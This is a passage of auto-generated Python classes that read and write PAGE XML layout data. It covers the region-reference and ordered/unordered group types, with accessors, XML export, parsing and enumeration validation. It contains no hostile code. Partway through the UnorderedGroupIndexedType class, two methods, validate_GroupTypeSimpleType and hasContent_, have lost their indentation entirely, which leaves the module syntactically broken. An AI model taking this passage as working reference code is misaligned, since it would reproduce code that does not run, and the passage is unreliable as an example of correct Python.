            namespacedef_ = imported_ns_def_
        if pretty_print:
            eol_ = '\n'
        else:
            eol_ = ''
        if self.original_tagname_ is not None and name_ == 'RegionRefIndexedType':
            # Round-trip under the tag name the element was parsed with.
            name_ = self.original_tagname_
        if UseCapturedNS_ and self.ns_prefix_:
            namespaceprefix_ = self.ns_prefix_ + ':'
        showIndent(outfile, level, pretty_print)
        outfile.write('<%s%s%s' % (namespaceprefix_, name_, namespacedef_ and ' ' + namespacedef_ or '', ))
        already_processed = set()
        self.exportAttributes(outfile, level, already_processed, namespaceprefix_, name_='RegionRefIndexedType')
        if self.hasContent_():
            outfile.write('>%s' % (eol_, ))
            self.exportChildren(outfile, level + 1, namespaceprefix_, namespacedef_, name_='RegionRefIndexedType', pretty_print=pretty_print)
            outfile.write('</%s%s>%s' % (namespaceprefix_, name_, eol_))
        else:
            outfile.write('/>%s' % (eol_, ))
    def exportAttributes(self, outfile, level, already_processed, namespaceprefix_='', name_='RegionRefIndexedType'):
        if self.index is not None and 'index' not in already_processed:
            already_processed.add('index')
            outfile.write(' index="%s"' % self.gds_format_integer(self.index, input_name='index'))
        if self.regionRef is not None and 'regionRef' not in already_processed:
            already_processed.add('regionRef')
            outfile.write(' regionRef=%s' % (self.gds_encode(self.gds_format_string(quote_attrib(self.regionRef), input_name='regionRef')), ))
    def exportChildren(self, outfile, level, namespaceprefix_='', namespacedef_='xmlns:pc="http://schema.primaresearch.org/PAGE/gts/pagecontent/2019-07-15"', name_='RegionRefIndexedType', fromsubclass_=False, pretty_print=True):
        # No child elements are defined for this type.
        pass
    def build(self, node, gds_collector_=None):
        """Populate this instance from the parsed XML *node*; returns self."""
        self.gds_collector_ = gds_collector_
        if SaveElementTreeNode:
            self.gds_elementtree_node_ = node
        already_processed = set()
        self.ns_prefix_ = node.prefix
        self.buildAttributes(node, node.attrib, already_processed)
        for child in node:
            nodeName_ = Tag_pattern_.match(child.tag).groups()[-1]
            self.buildChildren(child, node, nodeName_, gds_collector_=gds_collector_)
        return self
    def buildAttributes(self, node, attrs, already_processed):
        value = find_attr_value_('index', node)
        if value is not None and 'index' not in already_processed:
            already_processed.add('index')
            self.index = self.gds_parse_integer(value, node, 'index')
        value = find_attr_value_('regionRef', node)
        if value is not None and 'regionRef' not in already_processed:
            already_processed.add('regionRef')
            self.regionRef = value
    def buildChildren(self, child_, node, nodeName_, fromsubclass_=False, gds_collector_=None):
        # No child elements are defined for this type.
        pass
# end class RegionRefIndexedType
class OrderedGroupIndexedType(GeneratedsSuper):
    """Indexed group containing ordered elements
    Optional link to a parent region of nested regions.
    The parent region doubles as reading order group.
    Only the nested regions should be allowed as group members.
    Position (order number) of this item within the
    current hierarchy level.
    Is this group a continuation of another group (from
    previous column or page, for example)?
    For generic use"""
    __hash__ = GeneratedsSuper.__hash__
    # Generated member metadata: one MemberSpec_ per XML attribute/element.
    member_data_items_ = [
        MemberSpec_('id', 'string', 0, 0, {'use': 'required'}),
        MemberSpec_('regionRef', 'string', 0, 1, {'use': 'optional'}),
        MemberSpec_('index', 'int', 0, 0, {'use': 'required'}),
        MemberSpec_('caption', 'string', 0, 1, {'use': 'optional'}),
        MemberSpec_('type_', 'pc:GroupTypeSimpleType', 0, 1, {'use': 'optional'}),
        MemberSpec_('continuation', 'boolean', 0, 1, {'use': 'optional'}),
        MemberSpec_('custom', 'string', 0, 1, {'use': 'optional'}),
        MemberSpec_('comments', 'string', 0, 1, {'use': 'optional'}),
        MemberSpec_('UserDefined', 'UserDefinedType', 0, 1, {'maxOccurs': '1', 'minOccurs': '0', 'name': 'UserDefined', 'type': 'UserDefinedType'}, None),
        MemberSpec_('Labels', 'LabelsType', 1, 1, {'maxOccurs': 'unbounded', 'minOccurs': '0', 'name': 'Labels', 'type': 'LabelsType'}, None),
        MemberSpec_('RegionRefIndexed', 'RegionRefIndexedType', 1, 0, {'name': 'RegionRefIndexed', 'type': 'RegionRefIndexedType'}, 3),
        MemberSpec_('OrderedGroupIndexed', 'OrderedGroupIndexedType', 1, 0, {'name': 'OrderedGroupIndexed', 'type': 'OrderedGroupIndexedType'}, 3),
        MemberSpec_('UnorderedGroupIndexed', 'UnorderedGroupIndexedType', 1, 0, {'name': 'UnorderedGroupIndexed', 'type': 'UnorderedGroupIndexedType'}, 3),
    ]
    subclass = None
    superclass = None
    def __init__(self, id=None, regionRef=None, index=None, caption=None, type_=None, continuation=None, custom=None, comments=None, UserDefined=None, Labels=None, RegionRefIndexed=None, OrderedGroupIndexed=None, UnorderedGroupIndexed=None, gds_collector_=None, **kwargs_):
        """Initialize attributes and child collections; list-valued children
        default to fresh empty lists (no shared mutable defaults)."""
        self.gds_collector_ = gds_collector_
        self.gds_elementtree_node_ = None
        self.original_tagname_ = None
        self.parent_object_ = kwargs_.get('parent_object_')
        self.ns_prefix_ = "pc"
        self.id = _cast(None, id)
        self.id_nsprefix_ = None
        self.regionRef = _cast(None, regionRef)
        self.regionRef_nsprefix_ = None
        self.index = _cast(int, index)
        self.index_nsprefix_ = None
        self.caption = _cast(None, caption)
        self.caption_nsprefix_ = None
        self.type_ = _cast(None, type_)
        self.type__nsprefix_ = None
        self.continuation = _cast(bool, continuation)
        self.continuation_nsprefix_ = None
        self.custom = _cast(None, custom)
        self.custom_nsprefix_ = None
        self.comments = _cast(None, comments)
        self.comments_nsprefix_ = None
        self.UserDefined = UserDefined
        self.UserDefined_nsprefix_ = "pc"
        if Labels is None:
            self.Labels = []
        else:
            self.Labels = Labels
        self.Labels_nsprefix_ = "pc"
        if RegionRefIndexed is None:
            self.RegionRefIndexed = []
        else:
            self.RegionRefIndexed = RegionRefIndexed
        self.RegionRefIndexed_nsprefix_ = "pc"
        if OrderedGroupIndexed is None:
            self.OrderedGroupIndexed = []
        else:
            self.OrderedGroupIndexed = OrderedGroupIndexed
        self.OrderedGroupIndexed_nsprefix_ = "pc"
        if UnorderedGroupIndexed is None:
            self.UnorderedGroupIndexed = []
        else:
            self.UnorderedGroupIndexed = UnorderedGroupIndexed
        self.UnorderedGroupIndexed_nsprefix_ = "pc"
    def factory(*args_, **kwargs_):
        """Create an instance, honoring an externally registered subclass
        module if one is active."""
        if CurrentSubclassModule_ is not None:
            subclass = getSubclassFromModule_(
                CurrentSubclassModule_, OrderedGroupIndexedType)
            if subclass is not None:
                return subclass(*args_, **kwargs_)
        if OrderedGroupIndexedType.subclass:
            return OrderedGroupIndexedType.subclass(*args_, **kwargs_)
        else:
            return OrderedGroupIndexedType(*args_, **kwargs_)
    factory = staticmethod(factory)
    # --- trivial generated accessors ------------------------------------
    def get_ns_prefix_(self):
        return self.ns_prefix_
    def set_ns_prefix_(self, ns_prefix):
        self.ns_prefix_ = ns_prefix
    def get_UserDefined(self):
        return self.UserDefined
    def set_UserDefined(self, UserDefined):
        self.UserDefined = UserDefined
    def get_Labels(self):
        return self.Labels
    def set_Labels(self, Labels):
        self.Labels = Labels
    def add_Labels(self, value):
        self.Labels.append(value)
    def insert_Labels_at(self, index, value):
        self.Labels.insert(index, value)
    def replace_Labels_at(self, index, value):
        self.Labels[index] = value
    def get_RegionRefIndexed(self):
        return self.RegionRefIndexed
    def set_RegionRefIndexed(self, RegionRefIndexed):
        self.RegionRefIndexed = RegionRefIndexed
    def add_RegionRefIndexed(self, value):
        self.RegionRefIndexed.append(value)
    def insert_RegionRefIndexed_at(self, index, value):
        self.RegionRefIndexed.insert(index, value)
    def replace_RegionRefIndexed_at(self, index, value):
        self.RegionRefIndexed[index] = value
    def get_OrderedGroupIndexed(self):
        return self.OrderedGroupIndexed
    def set_OrderedGroupIndexed(self, OrderedGroupIndexed):
        self.OrderedGroupIndexed = OrderedGroupIndexed
    def add_OrderedGroupIndexed(self, value):
        self.OrderedGroupIndexed.append(value)
    def insert_OrderedGroupIndexed_at(self, index, value):
        self.OrderedGroupIndexed.insert(index, value)
    def replace_OrderedGroupIndexed_at(self, index, value):
        self.OrderedGroupIndexed[index] = value
    def get_UnorderedGroupIndexed(self):
        return self.UnorderedGroupIndexed
    def set_UnorderedGroupIndexed(self, UnorderedGroupIndexed):
        self.UnorderedGroupIndexed = UnorderedGroupIndexed
    def add_UnorderedGroupIndexed(self, value):
        self.UnorderedGroupIndexed.append(value)
    def insert_UnorderedGroupIndexed_at(self, index, value):
        self.UnorderedGroupIndexed.insert(index, value)
    def replace_UnorderedGroupIndexed_at(self, index, value):
        self.UnorderedGroupIndexed[index] = value
    def get_id(self):
        return self.id
    def set_id(self, id):
        self.id = id
    def get_regionRef(self):
        return self.regionRef
    def set_regionRef(self, regionRef):
        self.regionRef = regionRef
    def get_index(self):
        return self.index
    def set_index(self, index):
        self.index = index
    def get_caption(self):
        return self.caption
    def set_caption(self, caption):
        self.caption = caption
    def get_type(self):
        return self.type_
    def set_type(self, type_):
        self.type_ = type_
    def get_continuation(self):
        return self.continuation
    def set_continuation(self, continuation):
        self.continuation = continuation
    def get_custom(self):
        return self.custom
    def set_custom(self, custom):
        self.custom = custom
    def get_comments(self):
        return self.comments
    def set_comments(self, comments):
        self.comments = comments
    def validate_GroupTypeSimpleType(self, value):
        # Validate type pc:GroupTypeSimpleType, a restriction on string.
        # Reports enumeration violations through the message collector
        # rather than raising.
        if value is not None and Validate_simpletypes_ and self.gds_collector_ is not None:
            if not isinstance(value, str):
                lineno = self.gds_get_node_lineno_()
                self.gds_collector_.add_message('Value "%(value)s"%(lineno)s is not of the correct base simple type (str)' % {"value": value, "lineno": lineno, })
                return False
            value = value
            enumerations = ['paragraph', 'list', 'list-item', 'figure', 'article', 'div', 'other']
            if value not in enumerations:
                lineno = self.gds_get_node_lineno_()
                self.gds_collector_.add_message('Value "%(value)s"%(lineno)s does not match xsd enumeration restriction on GroupTypeSimpleType' % {"value" : encode_str_2_3(value), "lineno": lineno} )
                # NOTE(review): `result` is assigned but never returned;
                # quirk of the generated code, kept for fidelity.
                result = False
    def hasContent_(self):
        # True when the element has children and must be serialized with a
        # separate closing tag.
        if (
            self.UserDefined is not None or
            self.Labels or
            self.RegionRefIndexed or
            self.OrderedGroupIndexed or
            self.UnorderedGroupIndexed
        ):
            return True
        else:
            return False
    def export(self, outfile, level, namespaceprefix_='', namespacedef_='xmlns:pc="http://schema.primaresearch.org/PAGE/gts/pagecontent/2019-07-15"', name_='OrderedGroupIndexedType', pretty_print=True):
        """Serialize this element (attributes plus children) to *outfile*."""
        imported_ns_def_ = GenerateDSNamespaceDefs_.get('OrderedGroupIndexedType')
        if imported_ns_def_ is not None:
            namespacedef_ = imported_ns_def_
        if pretty_print:
            eol_ = '\n'
        else:
            eol_ = ''
        if self.original_tagname_ is not None and name_ == 'OrderedGroupIndexedType':
            # Round-trip under the tag name the element was parsed with.
            name_ = self.original_tagname_
        if UseCapturedNS_ and self.ns_prefix_:
            namespaceprefix_ = self.ns_prefix_ + ':'
        showIndent(outfile, level, pretty_print)
        outfile.write('<%s%s%s' % (namespaceprefix_, name_, namespacedef_ and ' ' + namespacedef_ or '', ))
        already_processed = set()
        self.exportAttributes(outfile, level, already_processed, namespaceprefix_, name_='OrderedGroupIndexedType')
        if self.hasContent_():
            outfile.write('>%s' % (eol_, ))
            self.exportChildren(outfile, level + 1, namespaceprefix_, namespacedef_, name_='OrderedGroupIndexedType', pretty_print=pretty_print)
            showIndent(outfile, level, pretty_print)
            outfile.write('</%s%s>%s' % (namespaceprefix_, name_, eol_))
        else:
            outfile.write('/>%s' % (eol_, ))
    def exportAttributes(self, outfile, level, already_processed, namespaceprefix_='', name_='OrderedGroupIndexedType'):
        # Each attribute is emitted once and recorded in already_processed
        # so subclasses do not write it a second time.
        if self.id is not None and 'id' not in already_processed:
            already_processed.add('id')
            outfile.write(' id=%s' % (self.gds_encode(self.gds_format_string(quote_attrib(self.id), input_name='id')), ))
        if self.regionRef is not None and 'regionRef' not in already_processed:
            already_processed.add('regionRef')
            outfile.write(' regionRef=%s' % (self.gds_encode(self.gds_format_string(quote_attrib(self.regionRef), input_name='regionRef')), ))
        if self.index is not None and 'index' not in already_processed:
            already_processed.add('index')
            outfile.write(' index="%s"' % self.gds_format_integer(self.index, input_name='index'))
        if self.caption is not None and 'caption' not in already_processed:
            already_processed.add('caption')
            outfile.write(' caption=%s' % (self.gds_encode(self.gds_format_string(quote_attrib(self.caption), input_name='caption')), ))
        if self.type_ is not None and 'type_' not in already_processed:
            already_processed.add('type_')
            outfile.write(' type=%s' % (self.gds_encode(self.gds_format_string(quote_attrib(self.type_), input_name='type')), ))
        if self.continuation is not None and 'continuation' not in already_processed:
            already_processed.add('continuation')
            outfile.write(' continuation="%s"' % self.gds_format_boolean(self.continuation, input_name='continuation'))
        if self.custom is not None and 'custom' not in already_processed:
            already_processed.add('custom')
            outfile.write(' custom=%s' % (self.gds_encode(self.gds_format_string(quote_attrib(self.custom), input_name='custom')), ))
        if self.comments is not None and 'comments' not in already_processed:
            already_processed.add('comments')
            outfile.write(' comments=%s' % (self.gds_encode(self.gds_format_string(quote_attrib(self.comments), input_name='comments')), ))
    def exportChildren(self, outfile, level, namespaceprefix_='', namespacedef_='xmlns:pc="http://schema.primaresearch.org/PAGE/gts/pagecontent/2019-07-15"', name_='OrderedGroupIndexedType', fromsubclass_=False, pretty_print=True):
        if pretty_print:
            eol_ = '\n'
        else:
            eol_ = ''
        if self.UserDefined is not None:
            namespaceprefix_ = self.UserDefined_nsprefix_ + ':' if (UseCapturedNS_ and self.UserDefined_nsprefix_) else ''
            self.UserDefined.export(outfile, level, namespaceprefix_, namespacedef_='', name_='UserDefined', pretty_print=pretty_print)
        for Labels_ in self.Labels:
            namespaceprefix_ = self.Labels_nsprefix_ + ':' if (UseCapturedNS_ and self.Labels_nsprefix_) else ''
            Labels_.export(outfile, level, namespaceprefix_, namespacedef_='', name_='Labels', pretty_print=pretty_print)
        for RegionRefIndexed_ in self.RegionRefIndexed:
            namespaceprefix_ = self.RegionRefIndexed_nsprefix_ + ':' if (UseCapturedNS_ and self.RegionRefIndexed_nsprefix_) else ''
            RegionRefIndexed_.export(outfile, level, namespaceprefix_, namespacedef_='', name_='RegionRefIndexed', pretty_print=pretty_print)
        for OrderedGroupIndexed_ in self.OrderedGroupIndexed:
            namespaceprefix_ = self.OrderedGroupIndexed_nsprefix_ + ':' if (UseCapturedNS_ and self.OrderedGroupIndexed_nsprefix_) else ''
            OrderedGroupIndexed_.export(outfile, level, namespaceprefix_, namespacedef_='', name_='OrderedGroupIndexed', pretty_print=pretty_print)
        for UnorderedGroupIndexed_ in self.UnorderedGroupIndexed:
            namespaceprefix_ = self.UnorderedGroupIndexed_nsprefix_ + ':' if (UseCapturedNS_ and self.UnorderedGroupIndexed_nsprefix_) else ''
            UnorderedGroupIndexed_.export(outfile, level, namespaceprefix_, namespacedef_='', name_='UnorderedGroupIndexed', pretty_print=pretty_print)
    def build(self, node, gds_collector_=None):
        """Populate this instance from the parsed XML *node*; returns self."""
        self.gds_collector_ = gds_collector_
        if SaveElementTreeNode:
            self.gds_elementtree_node_ = node
        already_processed = set()
        self.ns_prefix_ = node.prefix
        self.buildAttributes(node, node.attrib, already_processed)
        for child in node:
            nodeName_ = Tag_pattern_.match(child.tag).groups()[-1]
            self.buildChildren(child, node, nodeName_, gds_collector_=gds_collector_)
        return self
    def buildAttributes(self, node, attrs, already_processed):
        """Parse all XML attributes of this element, validating where the
        schema defines a restricted simple type."""
        value = find_attr_value_('id', node)
        if value is not None and 'id' not in already_processed:
            already_processed.add('id')
            self.id = value
        value = find_attr_value_('regionRef', node)
        if value is not None and 'regionRef' not in already_processed:
            already_processed.add('regionRef')
            self.regionRef = value
        value = find_attr_value_('index', node)
        if value is not None and 'index' not in already_processed:
            already_processed.add('index')
            self.index = self.gds_parse_integer(value, node, 'index')
        value = find_attr_value_('caption', node)
        if value is not None and 'caption' not in already_processed:
            already_processed.add('caption')
            self.caption = value
        value = find_attr_value_('type', node)
        if value is not None and 'type' not in already_processed:
            already_processed.add('type')
            self.type_ = value
            self.validate_GroupTypeSimpleType(self.type_)    # validate type GroupTypeSimpleType
        value = find_attr_value_('continuation', node)
        if value is not None and 'continuation' not in already_processed:
            already_processed.add('continuation')
            # xsd:boolean accepts the literals true/false/1/0 only.
            if value in ('true', '1'):
                self.continuation = True
            elif value in ('false', '0'):
                self.continuation = False
            else:
                raise_parse_error(node, 'Bad boolean attribute')
        value = find_attr_value_('custom', node)
        if value is not None and 'custom' not in already_processed:
            already_processed.add('custom')
            self.custom = value
        value = find_attr_value_('comments', node)
        if value is not None and 'comments' not in already_processed:
            already_processed.add('comments')
            self.comments = value
    def buildChildren(self, child_, node, nodeName_, fromsubclass_=False, gds_collector_=None):
        """Parse one child element and append/assign it to the matching
        member collection."""
        if nodeName_ == 'UserDefined':
            obj_ = UserDefinedType.factory(parent_object_=self)
            obj_.build(child_, gds_collector_=gds_collector_)
            self.UserDefined = obj_
            obj_.original_tagname_ = 'UserDefined'
        elif nodeName_ == 'Labels':
            obj_ = LabelsType.factory(parent_object_=self)
            obj_.build(child_, gds_collector_=gds_collector_)
            self.Labels.append(obj_)
            obj_.original_tagname_ = 'Labels'
        elif nodeName_ == 'RegionRefIndexed':
            obj_ = RegionRefIndexedType.factory(parent_object_=self)
            obj_.build(child_, gds_collector_=gds_collector_)
            self.RegionRefIndexed.append(obj_)
            obj_.original_tagname_ = 'RegionRefIndexed'
        elif nodeName_ == 'OrderedGroupIndexed':
            obj_ = OrderedGroupIndexedType.factory(parent_object_=self)
            obj_.build(child_, gds_collector_=gds_collector_)
            self.OrderedGroupIndexed.append(obj_)
            obj_.original_tagname_ = 'OrderedGroupIndexed'
        elif nodeName_ == 'UnorderedGroupIndexed':
            obj_ = UnorderedGroupIndexedType.factory(parent_object_=self)
            obj_.build(child_, gds_collector_=gds_collector_)
            self.UnorderedGroupIndexed.append(obj_)
            obj_.original_tagname_ = 'UnorderedGroupIndexed'
# end class OrderedGroupIndexedType
class UnorderedGroupIndexedType(GeneratedsSuper):
    """Indexed group containing unordered elements
    Optional link to a parent region of nested regions.
    The parent region doubles as reading order group.
    Only the nested regions should be allowed as group members.
    Position (order number) of this item within the
    current hierarchy level.
    Is this group a continuation of another group
    (from previous column or page, for example)?
    For generic use"""
    __hash__ = GeneratedsSuper.__hash__
    # Generated member metadata: one MemberSpec_ per XML attribute/element.
    member_data_items_ = [
        MemberSpec_('id', 'string', 0, 0, {'use': 'required'}),
        MemberSpec_('regionRef', 'string', 0, 1, {'use': 'optional'}),
        MemberSpec_('index', 'int', 0, 0, {'use': 'required'}),
        MemberSpec_('caption', 'string', 0, 1, {'use': 'optional'}),
        MemberSpec_('type_', 'pc:GroupTypeSimpleType', 0, 1, {'use': 'optional'}),
        MemberSpec_('continuation', 'boolean', 0, 1, {'use': 'optional'}),
        MemberSpec_('custom', 'string', 0, 1, {'use': 'optional'}),
        MemberSpec_('comments', 'string', 0, 1, {'use': 'optional'}),
        MemberSpec_('UserDefined', 'UserDefinedType', 0, 1, {'maxOccurs': '1', 'minOccurs': '0', 'name': 'UserDefined', 'type': 'UserDefinedType'}, None),
        MemberSpec_('Labels', 'LabelsType', 1, 1, {'maxOccurs': 'unbounded', 'minOccurs': '0', 'name': 'Labels', 'type': 'LabelsType'}, None),
        MemberSpec_('RegionRef', 'RegionRefType', 1, 0, {'name': 'RegionRef', 'type': 'RegionRefType'}, 4),
        MemberSpec_('OrderedGroup', 'OrderedGroupType', 1, 0, {'name': 'OrderedGroup', 'type': 'OrderedGroupType'}, 4),
        MemberSpec_('UnorderedGroup', 'UnorderedGroupType', 1, 0, {'name': 'UnorderedGroup', 'type': 'UnorderedGroupType'}, 4),
    ]
    subclass = None
    superclass = None
    def __init__(self, id=None, regionRef=None, index=None, caption=None, type_=None, continuation=None, custom=None, comments=None, UserDefined=None, Labels=None, RegionRef=None, OrderedGroup=None, UnorderedGroup=None, gds_collector_=None, **kwargs_):
        """Initialize attributes and child collections; list-valued children
        default to fresh empty lists (no shared mutable defaults)."""
        self.gds_collector_ = gds_collector_
        self.gds_elementtree_node_ = None
        self.original_tagname_ = None
        self.parent_object_ = kwargs_.get('parent_object_')
        self.ns_prefix_ = "pc"
        self.id = _cast(None, id)
        self.id_nsprefix_ = None
        self.regionRef = _cast(None, regionRef)
        self.regionRef_nsprefix_ = None
        self.index = _cast(int, index)
        self.index_nsprefix_ = None
        self.caption = _cast(None, caption)
        self.caption_nsprefix_ = None
        self.type_ = _cast(None, type_)
        self.type__nsprefix_ = None
        self.continuation = _cast(bool, continuation)
        self.continuation_nsprefix_ = None
        self.custom = _cast(None, custom)
        self.custom_nsprefix_ = None
        self.comments = _cast(None, comments)
        self.comments_nsprefix_ = None
        self.UserDefined = UserDefined
        self.UserDefined_nsprefix_ = "pc"
        if Labels is None:
            self.Labels = []
        else:
            self.Labels = Labels
        self.Labels_nsprefix_ = "pc"
        if RegionRef is None:
            self.RegionRef = []
        else:
            self.RegionRef = RegionRef
        self.RegionRef_nsprefix_ = "pc"
        if OrderedGroup is None:
            self.OrderedGroup = []
        else:
            self.OrderedGroup = OrderedGroup
        self.OrderedGroup_nsprefix_ = "pc"
        if UnorderedGroup is None:
            self.UnorderedGroup = []
        else:
            self.UnorderedGroup = UnorderedGroup
        self.UnorderedGroup_nsprefix_ = "pc"
    def factory(*args_, **kwargs_):
        """Create an instance, honoring an externally registered subclass
        module if one is active."""
        if CurrentSubclassModule_ is not None:
            subclass = getSubclassFromModule_(
                CurrentSubclassModule_, UnorderedGroupIndexedType)
            if subclass is not None:
                return subclass(*args_, **kwargs_)
        if UnorderedGroupIndexedType.subclass:
            return UnorderedGroupIndexedType.subclass(*args_, **kwargs_)
        else:
            return UnorderedGroupIndexedType(*args_, **kwargs_)
    factory = staticmethod(factory)
    # --- trivial generated accessors ------------------------------------
    def get_ns_prefix_(self):
        return self.ns_prefix_
    def set_ns_prefix_(self, ns_prefix):
        self.ns_prefix_ = ns_prefix
    def get_UserDefined(self):
        return self.UserDefined
    def set_UserDefined(self, UserDefined):
        self.UserDefined = UserDefined
    def get_Labels(self):
        return self.Labels
    def set_Labels(self, Labels):
        self.Labels = Labels
    def add_Labels(self, value):
        self.Labels.append(value)
    def insert_Labels_at(self, index, value):
        self.Labels.insert(index, value)
    def replace_Labels_at(self, index, value):
        self.Labels[index] = value
    def get_RegionRef(self):
        return self.RegionRef
    def set_RegionRef(self, RegionRef):
        self.RegionRef = RegionRef
    def add_RegionRef(self, value):
        self.RegionRef.append(value)
    def insert_RegionRef_at(self, index, value):
        self.RegionRef.insert(index, value)
    def replace_RegionRef_at(self, index, value):
        self.RegionRef[index] = value
    def get_OrderedGroup(self):
        return self.OrderedGroup
    def set_OrderedGroup(self, OrderedGroup):
        self.OrderedGroup = OrderedGroup
    def add_OrderedGroup(self, value):
        self.OrderedGroup.append(value)
    def insert_OrderedGroup_at(self, index, value):
        self.OrderedGroup.insert(index, value)
    def replace_OrderedGroup_at(self, index, value):
        self.OrderedGroup[index] = value
    def get_UnorderedGroup(self):
        return self.UnorderedGroup
    def set_UnorderedGroup(self, UnorderedGroup):
        self.UnorderedGroup = UnorderedGroup
    def add_UnorderedGroup(self, value):
        self.UnorderedGroup.append(value)
    def insert_UnorderedGroup_at(self, index, value):
        self.UnorderedGroup.insert(index, value)
    def replace_UnorderedGroup_at(self, index, value):
        self.UnorderedGroup[index] = value
    def get_id(self):
        return self.id
    def set_id(self, id):
        self.id = id
    def get_regionRef(self):
        return self.regionRef
    def set_regionRef(self, regionRef):
        self.regionRef = regionRef
    def get_index(self):
        return self.index
    def set_index(self, index):
        self.index = index
    def get_caption(self):
        return self.caption
    def set_caption(self, caption):
        self.caption = caption
    def get_type(self):
        return self.type_
    def set_type(self, type_):
        self.type_ = type_
    def get_continuation(self):
        return self.continuation
    def set_continuation(self, continuation):
        self.continuation = continuation
    def get_custom(self):
        return self.custom
    def set_custom(self, custom):
        self.custom = custom
    def get_comments(self):
        return self.comments
    def set_comments(self, comments):
        self.comments = comments
def validate_GroupTypeSimpleType(self, value):
# Validate type pc:GroupTypeSimpleType, a restriction on string.
if value is not None and Validate_simpletypes_ and self.gds_collector_ is not None:
if not isinstance(value, str):
lineno = self.gds_get_node_lineno_()
self.gds_collector_.add_message('Value "%(value)s"%(lineno)s is not of the correct base simple type (str)' % {"value": value, "lineno": lineno, })
return False
value = value
enumerations = ['paragraph', 'list', 'list-item', 'figure', 'article', 'div', 'other']
if value not in enumerations:
lineno = self.gds_get_node_lineno_()
self.gds_collector_.add_message('Value "%(value)s"%(lineno)s does not match xsd enumeration restriction on GroupTypeSimpleType' % {"value" : encode_str_2_3(value), "lineno": lineno} )
result = False
def hasContent_(self):
if (
self.UserDefined is not None or
self.Labels or
self.RegionRef or
self.OrderedGroup or
self.UnorderedGroup
):
return True
else:
return False
    def export(self, outfile, level, namespaceprefix_='', namespacedef_='xmlns:pc="http://schema.primaresearch.org/PAGE/gts/pagecontent/2019-07-15"', name_='UnorderedGroupIndexedType', pretty_print=True):
        """Serialize this element as XML to *outfile*, indented at *level*."""
        imported_ns_def_ = GenerateDSNamespaceDefs_.get('UnorderedGroupIndexedType')
        if imported_ns_def_ is not None:
            namespacedef_ = imported_ns_def_
        if pretty_print:
            eol_ = '\n'
        else:
            eol_ = ''
        # Re-emit the tag name the element was originally parsed with.
        if self.original_tagname_ is not None and name_ == 'UnorderedGroupIndexedType':
            name_ = self.original_tagname_
        if UseCapturedNS_ and self.ns_prefix_:
            namespaceprefix_ = self.ns_prefix_ + ':'
        showIndent(outfile, level, pretty_print)
        outfile.write('<%s%s%s' % (namespaceprefix_, name_, namespacedef_ and ' ' + namespacedef_ or '', ))
        already_processed = set()
        self.exportAttributes(outfile, level, already_processed, namespaceprefix_, name_='UnorderedGroupIndexedType')
        if self.hasContent_():
            outfile.write('>%s' % (eol_, ))
            self.exportChildren(outfile, level + 1, namespaceprefix_, namespacedef_, name_='UnorderedGroupIndexedType', pretty_print=pretty_print)
            showIndent(outfile, level, pretty_print)
            outfile.write('</%s%s>%s' % (namespaceprefix_, name_, eol_))
        else:
            # No children: emit a self-closing tag.
            outfile.write('/>%s' % (eol_, ))
    def exportAttributes(self, outfile, level, already_processed, namespaceprefix_='', name_='UnorderedGroupIndexedType'):
        """Write this element's XML attributes; *already_processed* guards against duplicates."""
        if self.id is not None and 'id' not in already_processed:
            already_processed.add('id')
            outfile.write(' id=%s' % (self.gds_encode(self.gds_format_string(quote_attrib(self.id), input_name='id')), ))
        if self.regionRef is not None and 'regionRef' not in already_processed:
            already_processed.add('regionRef')
            outfile.write(' regionRef=%s' % (self.gds_encode(self.gds_format_string(quote_attrib(self.regionRef), input_name='regionRef')), ))
        if self.index is not None and 'index' not in already_processed:
            already_processed.add('index')
            outfile.write(' index="%s"' % self.gds_format_integer(self.index, input_name='index'))
        if self.caption is not None and 'caption' not in already_processed:
            already_processed.add('caption')
            outfile.write(' caption=%s' % (self.gds_encode(self.gds_format_string(quote_attrib(self.caption), input_name='caption')), ))
        if self.type_ is not None and 'type_' not in already_processed:
            already_processed.add('type_')
            outfile.write(' type=%s' % (self.gds_encode(self.gds_format_string(quote_attrib(self.type_), input_name='type')), ))
        if self.continuation is not None and 'continuation' not in already_processed:
            already_processed.add('continuation')
            outfile.write(' continuation="%s"' % self.gds_format_boolean(self.continuation, input_name='continuation'))
        if self.custom is not None and 'custom' not in already_processed:
            already_processed.add('custom')
            outfile.write(' custom=%s' % (self.gds_encode(self.gds_format_string(quote_attrib(self.custom), input_name='custom')), ))
        if self.comments is not None and 'comments' not in already_processed:
            already_processed.add('comments')
            outfile.write(' comments=%s' % (self.gds_encode(self.gds_format_string(quote_attrib(self.comments), input_name='comments')), ))
    def exportChildren(self, outfile, level, namespaceprefix_='', namespacedef_='xmlns:pc="http://schema.primaresearch.org/PAGE/gts/pagecontent/2019-07-15"', name_='UnorderedGroupIndexedType', fromsubclass_=False, pretty_print=True):
        """Write child elements in schema order: UserDefined, Labels, then group members."""
        if pretty_print:
            eol_ = '\n'
        else:
            eol_ = ''
        if self.UserDefined is not None:
            namespaceprefix_ = self.UserDefined_nsprefix_ + ':' if (UseCapturedNS_ and self.UserDefined_nsprefix_) else ''
            self.UserDefined.export(outfile, level, namespaceprefix_, namespacedef_='', name_='UserDefined', pretty_print=pretty_print)
        for Labels_ in self.Labels:
            namespaceprefix_ = self.Labels_nsprefix_ + ':' if (UseCapturedNS_ and self.Labels_nsprefix_) else ''
            Labels_.export(outfile, level, namespaceprefix_, namespacedef_='', name_='Labels', pretty_print=pretty_print)
        for RegionRef_ in self.RegionRef:
            namespaceprefix_ = self.RegionRef_nsprefix_ + ':' if (UseCapturedNS_ and self.RegionRef_nsprefix_) else ''
            RegionRef_.export(outfile, level, namespaceprefix_, namespacedef_='', name_='RegionRef', pretty_print=pretty_print)
        for OrderedGroup_ in self.OrderedGroup:
            namespaceprefix_ = self.OrderedGroup_nsprefix_ + ':' if (UseCapturedNS_ and self.OrderedGroup_nsprefix_) else ''
            OrderedGroup_.export(outfile, level, namespaceprefix_, namespacedef_='', name_='OrderedGroup', pretty_print=pretty_print)
        for UnorderedGroup_ in self.UnorderedGroup:
            namespaceprefix_ = self.UnorderedGroup_nsprefix_ + ':' if (UseCapturedNS_ and self.UnorderedGroup_nsprefix_) else ''
            UnorderedGroup_.export(outfile, level, namespaceprefix_, namespacedef_='', name_='UnorderedGroup', pretty_print=pretty_print)
    def build(self, node, gds_collector_=None):
        """Populate this object from an ElementTree *node*; returns self."""
        self.gds_collector_ = gds_collector_
        if SaveElementTreeNode:
            self.gds_elementtree_node_ = node
        already_processed = set()
        self.ns_prefix_ = node.prefix
        self.buildAttributes(node, node.attrib, already_processed)
        for child in node:
            # Strip any namespace qualifier from the child tag before dispatch.
